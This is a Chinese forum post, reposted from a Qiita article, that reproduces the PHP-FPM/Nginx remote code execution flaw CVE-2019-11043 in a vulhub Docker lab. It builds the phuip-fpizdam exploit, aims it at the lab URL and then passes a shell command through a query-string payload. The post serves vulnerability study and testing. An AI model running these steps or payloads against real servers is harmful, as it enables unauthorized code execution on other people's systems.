[漏洞复现]CVE-2019-11043/PHP-FPM在Nginx特定配置下远程代码执行
本帖最后由 Te5tB99 于 2019-10-25 23:55 编辑环境准备
可以使用vulhub的环境
先在本地创建一个名为CVE-2019-11043的文件夹,再创建一个名为www的文件夹
在CVE-2019-11043文件夹下执行如下命令
wget https://raw.githubusercontent.com/vulhub/vulhub/master/php/CVE-2019-11043/default.conf
wget https://raw.githubusercontent.com/vulhub/vulhub/master/php/CVE-2019-11043/docker-compose.yml
在CVE-2019-11043/www文件夹下执行如下命令
wget https://raw.githubusercontent.com/vulhub/vulhub/master/php/CVE-2019-11043/www/index.php
下载完成三个文件以后,在CVE-2019-11043文件夹下执行如下命令启动环境
service docker start
docker-compose up -d
随后访问http://ip:8080/index.php即可
工具准备
访问https://github.com/neex/phuip-fpizdam,clone到本地以后,执行如下命令(将根据OS自动生成对应的OS版本)
go build
https://qiita-user-contents.imgix.net/https%3A%2F%2Fqiita-image-store.s3.ap-northeast-1.amazonaws.com%2F0%2F491410%2F727451f9-c900-f24b-a6dd-9d06651bd037.png?ixlib=rb-1.2.2&auto=compress%2Cformat&gif-q=60&w=1400&fit=max&s=6d92727b96fc3313a301405a2f04db4b
即可生成phuip-fpizdam工具
漏洞复现
使用./phuip-fpizdam http://ip:8080/index.php攻击漏洞环境
https://qiita-user-contents.imgix.net/https%3A%2F%2Fqiita-image-store.s3.ap-northeast-1.amazonaws.com%2F0%2F491410%2Fa092dcda-490f-f9f1-05cf-7827fe6f8195.png?ixlib=rb-1.2.2&auto=compress%2Cformat&gif-q=60&w=1400&fit=max&s=9b1342a184fe5ed2db5d0e373554c290
随后访问http://ip:8080/index.php?a=/bin/sh+-c%20%27id%27&即可
https://qiita-user-contents.imgix.net/https%3A%2F%2Fqiita-image-store.s3.ap-northeast-1.amazonaws.com%2F0%2F491410%2Ffbe6700d-96ed-3c7c-fb3d-0525ee6a2c1f.png?ixlib=rb-1.2.2&auto=compress%2Cformat&gif-q=60&w=1400&fit=max&s=1a1851d1da6fbf66e0deff8ddcbd321a
按照步骤已成功在mac上复现,但因涉及环境及服务较多,复现结果以实际为准;建议大家在linux系统复现。
该文章转自亚信科技 清水 川崎 @shimizukawasaki的qiita文章。
原文链接点我阅读原文
页:
[1]